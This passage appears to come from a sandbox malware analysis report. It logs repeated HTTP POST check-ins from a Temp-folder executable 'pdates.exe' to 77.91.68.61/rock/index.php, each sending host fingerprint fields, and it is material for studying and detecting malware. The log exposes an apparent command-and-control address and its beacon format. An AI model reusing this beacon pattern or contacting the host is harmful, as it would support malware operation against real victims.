Jul 27, 2023 01:35:29.178338051 CEST	4170	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:29.226959944 CEST	4171	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
548	192.168.2.5	50269	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:29.388073921 CEST	4171	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:29.436691046 CEST	4172	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
549	192.168.2.5	50270	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:29.624015093 CEST	4172	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:29.671662092 CEST	4173	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.5	49772	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:18.203859091 CEST	2900	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:18.251871109 CEST	2900	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
550	192.168.2.5	50271	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:29.841355085 CEST	4173	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:29.890919924 CEST	4173	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
551	192.168.2.5	50272	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:30.049351931 CEST	4174	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:30.097923994 CEST	4174	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
552	192.168.2.5	50273	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:30.264059067 CEST	4175	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:30.315011024 CEST	4175	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
553	192.168.2.5	50274	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:30.507813931 CEST	4176	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:30.556301117 CEST	4176	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
554	192.168.2.5	50275	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:30.723264933 CEST	4177	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:30.771037102 CEST	4177	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
555	192.168.2.5	50276	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:30.957941055 CEST	4178	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:31.008023977 CEST	4178	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
556	192.168.2.5	50277	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:31.162061930 CEST	4179	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:31.212196112 CEST	4179	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
557	192.168.2.5	50278	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:31.381724119 CEST	4180	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:31.430825949 CEST	4180	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
558	192.168.2.5	50279	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:31.611447096 CEST	4181	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:31.659985065 CEST	4181	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
559	192.168.2.5	50280	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:31.818039894 CEST	4182	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:31.865866899 CEST	4182	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.5	49773	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:18.426799059 CEST	2901	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:18.475754023 CEST	2901	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
560	192.168.2.5	50281	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:32.019201040 CEST	4183	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:32.070655107 CEST	4183	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
561	192.168.2.5	50282	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:32.230972052 CEST	4184	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:32.279985905 CEST	4184	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
562	192.168.2.5	50283	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:32.452176094 CEST	4185	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:32.500648022 CEST	4185	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
563	192.168.2.5	50284	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:32.670672894 CEST	4186	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:32.718630075 CEST	4186	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
564	192.168.2.5	50285	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:32.881206989 CEST	4187	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:32.929081917 CEST	4187	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
565	192.168.2.5	50286	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:33.094156981 CEST	4187	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:33.144102097 CEST	4188	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
566	192.168.2.5	50287	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:33.328664064 CEST	4188	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:33.380466938 CEST	4189	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
567	192.168.2.5	50288	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:33.540666103 CEST	4189	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:33.588643074 CEST	4190	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
568	192.168.2.5	50289	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
